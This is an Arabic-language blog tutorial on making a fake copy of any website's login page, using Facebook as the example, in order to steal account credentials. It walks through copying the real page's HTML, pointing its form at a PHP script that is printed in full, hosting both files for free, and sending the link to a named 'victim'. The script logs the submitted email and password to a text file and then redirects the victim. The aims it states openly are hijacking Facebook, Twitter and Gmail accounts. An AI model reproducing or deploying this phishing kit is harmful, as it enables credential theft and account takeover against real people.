recent
أخبار ساخنة

صناعة صفحة مزورة لاي موقع

الصفحة الرئيسية
صناعة صفحة مزورة لاي موقع 2020
صفحة مزورة

صفحات مزورة 2020

صناعة صفحة مزورة لاي موقع,انشاء صفحة مزورة 2019,برنامج صنع صفحات مزورة,تصميم صفحة مزورة + التعديل عليها + رفعها + اختصار الروابط,ازاى اعمل صفحة مزورة على الفيس بوك,موقع الصفحات المزورة الجاهزة waspami,مقبرة الفايسبوك صفحات مزورة,كيفية عمل صفحة مزورة لسرقة الايميلات مواقع صفحات مزورة شغالة
صناعة صفحة مزورة لاي موقع 2020



- مرحباً مجدداً يا أصدقاء على موقعكم وقنواتكم التابعة لـ القرصان الإلكتروني للتعليم .

- في درسنا اليوم سوف نتعلم معاً صنع صفحة مزورة باليد أو صنع صفحة مزورة بنفسك 2020 وذلك دون الحاجة للمواقع الجاهزة وكنا قد شرحنا سابقاً أيضاً موضوع بخصوص صفحة مزورة وتستطيع الرجوع إليه من خلال العنوان التالي صنع صفحة مزورة احترافية بدون لغات برمجة وبدون مواقع 2020 .

صفحات مزورة

- الصفحات المزورة الجميع يبحث عن هذا الأمر وغالباً ما تصلني رسائل من خلال صفحة اتصل بنا على المدونة عن كيفية صنع صفحة مزورة بيدنا أي أن نقوم ببرمجتها أوتوماتيكياً باستخدام لغة برمجية لاختراق حساب فيس بوك أو اختراق حساب تويتر أو حتى احتراق حساب جيميل ، وحقاً هذا أمر رائع وأعجبني صراحة لأن هناك أشخاص لا يبحثون عن الشيء جاهز بل يحبون أن يقوموا بصناعته بنفسهم ، فاستجابةً لما طلبه المتابعين والزائرين الكرام عن  عمل صفحة مزورة  سوف نقدم لكم اليوم شرح للمبتدأين بشكل مبسط وخفيف وفي الأيام القادمة سوف نقوم بشرح الأشياء المتقدمة لـ  تصميم صفحة مزورة .

شرح صنع صفحة مزورة لأي موقع

1- في البداية سوف تحتاج الى وضع هدف وهو مثلاً ، ماذا تريد أن تصنع صفحة مزورة لأي موقع .
2 – بعد اختيار الهدف فالنفترض أننا اخترنا صناعة صفحة مزورة للفيس بوك .
3 – نقوم بالتوجه الى موقع فيس بوك الى الصفحة التي نريد تزويرها ونقوم بالنقر على زر الفأر الأيمن ونختار " فحص " إن كنت على متصفح كروم .

4- بعد ذلك نقوم بنسخ الكود الخاص بالصفحة كامل من الوسم <html> ونحتفظ به على مستند نصي بصيغة .html على سبيل المثال نسميه ( facebook.html )  .



5- بعد حفظ الملف سوف نقوم بفتحه والبحث عن الكود التالي :
< form method="post" action=
وسنلاحظ بعد علامة الـ = في كلمة action أن هناك رابط ، نقوم بإزالته ونكتب بدلاً منه التالي:
Login.php
وكذلك نقوم بتغير كلمة post الى get ونقوم بالحفظ .

6- بعد ذلك نقوم بفتح مستند نصي جديد ونسميه ( Login.php ) ونضع بداخلها الأكواد التالية :

<?php
header ('Location: http://yahoo.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
إذا لم تستطع نسخ الكود قم بنسخه من خلال النقر على صفحات مزروة 

من ثم نقوم بحفظ الملف على حالها .

7- نقوم الآن بالتسجيل بأحد خدمات الاستضافة المجانية مثل 000webhost.com أو غيره ونرفع الملفات التي أنشأنها الى الخادم الخاص بالاستضافة .

8 – نقوم بعدها بأخذ رابط الملف الذي رفعنها والذي يحمل اسم facebook.html ونرسله للضحية أو الشخص المستهدف ، وبعد ادخال المعلومات سوف تتوجه الى لوحة التحكم في الموقع لديك وستجد ملف باسم log.txt ستقوم بفتحه وستلاحظ وجود البريد الإلكتروني وكلمة السر للشخص المستهدف .

- الى هنا نكون قد انتهينا من شرحنا اليوم أتمنى أن يكون قد أفداكم وأتمنى استخدامه في الأمور المرضية وعدم انتهاك حقوق الآخرين ، وإن أعجبكم الشرح الرجاء إخبارنا في التعليقات لنشرح لكم في الدرس القادم عن موضوع بخصوص sp0m صفحات مزورة ، والى اللقاء في درس جديد .

google-playkhamsatmostaqltradent